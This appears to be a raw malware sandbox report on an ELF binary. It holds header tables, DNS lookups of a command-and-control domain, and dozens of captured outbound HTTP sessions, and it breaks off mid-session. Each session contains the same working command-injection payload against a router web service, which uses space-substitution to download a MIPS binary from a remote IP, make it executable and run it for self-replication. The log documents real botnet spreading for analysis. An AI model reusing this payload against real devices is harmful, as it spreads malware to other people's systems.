                                            Machine:Intel 80386
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:UNIX - System V
                                            ABI Version:0
                                            Entry Point Address:0x8048164
                                            Flags:0x0
                                            ELF Header Size:52
                                            Program Header Offset:52
                                            Program Header Size:32
                                            Number of Program Headers:3
                                            Section Header Offset:102680
                                            Section Header Size:40
                                            Number of Section Headers:10
                                            Header String Table Index:9
                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                            NULL0x00x00x00x00x0000
                                            .initPROGBITS0x80480940x940x1c0x00x6AX001
                                            .textPROGBITS0x80480b00xb00x120d60x00x6AX0016
                                            .finiPROGBITS0x805a1860x121860x170x00x6AX001
                                            .rodataPROGBITS0x805a1a00x121a00x27b00x00x2A0032
                                            .ctorsPROGBITS0x805d9540x149540xc0x00x3WA004
                                            .dtorsPROGBITS0x805d9600x149600x80x00x3WA004
                                            .dataPROGBITS0x805d9800x149800x47580x00x3WA0032
                                            .bssNOBITS0x80620e00x190d80x492c0x00x3WA0032
                                            .shstrtabSTRTAB0x00x190d80x3e0x00x0001
                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                            LOAD0x00x80480000x80480000x149500x149506.59000x5R E0x1000.init .text .fini .rodata
                                            LOAD0x149540x805d9540x805d9540x47840x90b80.37370x6RW 0x1000.ctors .dtors .data .bss
                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 14, 2024 15:50:16.114578009 CET192.168.2.238.8.8.80xa244Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:21.118355989 CET192.168.2.238.8.8.80xa244Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:31.949464083 CET192.168.2.238.8.8.80xe73fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:39.792761087 CET192.168.2.238.8.8.80xeaffStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:41.650943995 CET192.168.2.238.8.8.80xeda9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:46.480597019 CET192.168.2.238.8.8.80x82b3Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:49.303755999 CET192.168.2.238.8.8.80xb0fdStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:56.175170898 CET192.168.2.238.8.8.80xe676Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:05.190606117 CET192.168.2.238.8.8.80x9149Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:14.015763998 CET192.168.2.238.8.8.80xd90bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:19.839364052 CET192.168.2.238.8.8.80xc980Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:26.686748981 CET192.168.2.238.8.8.80xe2beStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:31.539063931 CET192.168.2.238.8.8.80x439dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:41.429900885 CET192.168.2.238.8.8.80xb184Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:46.295650005 CET192.168.2.238.8.8.80x80c9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:56.144108057 CET192.168.2.238.8.8.80x2656Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:01.979763031 CET192.168.2.238.8.8.80xcdb9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:05.848256111 CET192.168.2.238.8.8.80xdffbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:10.851736069 CET192.168.2.238.8.8.80xdffbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:14.744117022 CET192.168.2.238.8.8.80x7085Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 14, 2024 15:50:21.226074934 CET8.8.8.8192.168.2.230xa244No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:32.049416065 CET8.8.8.8192.168.2.230xe73fNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:39.895704031 CET8.8.8.8192.168.2.230xeaffNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:41.751502991 CET8.8.8.8192.168.2.230xeda9No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:46.580971003 CET8.8.8.8192.168.2.230x82b3No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:49.404026031 CET8.8.8.8192.168.2.230xb0fdNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:50:56.275448084 CET8.8.8.8192.168.2.230xe676No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:05.290643930 CET8.8.8.8192.168.2.230x9149No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:14.115727901 CET8.8.8.8192.168.2.230xd90bNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:19.947309017 CET8.8.8.8192.168.2.230xc980No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:26.786753893 CET8.8.8.8192.168.2.230xe2beNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:31.639027119 CET8.8.8.8192.168.2.230x439dNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:41.530292988 CET8.8.8.8192.168.2.230xb184No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:46.395512104 CET8.8.8.8192.168.2.230x80c9No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:51:56.244532108 CET8.8.8.8192.168.2.230x2656No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:02.079627991 CET8.8.8.8192.168.2.230xcdb9No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:10.960675955 CET8.8.8.8192.168.2.230xdffbNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Jan 14, 2024 15:52:14.850153923 CET8.8.8.8192.168.2.230x7085No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                            Session IDSource IPSource PortDestination IPDestination Port
                                            0192.168.2.2350172122.159.207.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126679897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1192.168.2.234413023.126.145.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126701117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2192.168.2.234439845.202.222.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126704931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192.168.2.2356848169.169.98.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126773119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4192.168.2.2347162185.207.221.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126782894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192.168.2.234221681.145.128.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126821995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6192.168.2.234239251.50.86.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126892090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7192.168.2.2357246207.238.97.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126913071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8192.168.2.235637020.188.227.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.126993895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9192.168.2.234557241.23.17.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127038956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10192.168.2.2360022116.104.118.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127109051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11192.168.2.2356666166.205.170.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127140045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12192.168.2.233686434.250.140.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127191067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13192.168.2.2345630220.115.11.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127238035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14192.168.2.234699041.122.81.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127238035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15192.168.2.2354672209.135.30.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127249002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16192.168.2.2333342181.137.53.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127279043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17192.168.2.234884825.185.182.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127384901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18192.168.2.2359182154.111.247.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127408981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19192.168.2.234234496.153.159.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127417088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192.168.2.2336558211.246.111.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127460957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21192.168.2.234633884.91.6.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127491951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22192.168.2.235749439.110.29.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127509117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23192.168.2.233652227.147.206.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127557039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24192.168.2.2347954173.179.110.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127602100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25192.168.2.2359654142.233.21.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127650976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192.168.2.2360998182.215.177.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127718925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192.168.2.23367364.244.99.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127718925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192.168.2.233855694.52.3.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127748013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192.168.2.235363045.57.106.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127763033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            30192.168.2.234458825.196.38.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127887011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            31192.168.2.2357584105.91.84.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127893925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            32192.168.2.233734271.124.198.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127917051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            33192.168.2.233651271.22.131.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.127975941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            34192.168.2.2344154133.149.247.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128017902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            35192.168.2.2351366143.210.110.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128035069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            36192.168.2.234622059.14.5.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128058910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            37192.168.2.233952458.151.87.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128097057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            38192.168.2.234498032.208.75.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128158092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            39192.168.2.234543457.98.126.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128175974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            40192.168.2.235012635.76.26.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128253937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            41192.168.2.236024284.21.226.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128266096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            42192.168.2.2354948194.180.78.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128298998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            43192.168.2.2359714111.254.238.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128331900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            44192.168.2.235662680.238.2.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128372908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            45192.168.2.2338358203.57.34.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128392935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            46192.168.2.235128814.93.98.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.128400087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            47192.168.2.233401294.178.1.26443
                                            TimestampBytes transferredDirectionData
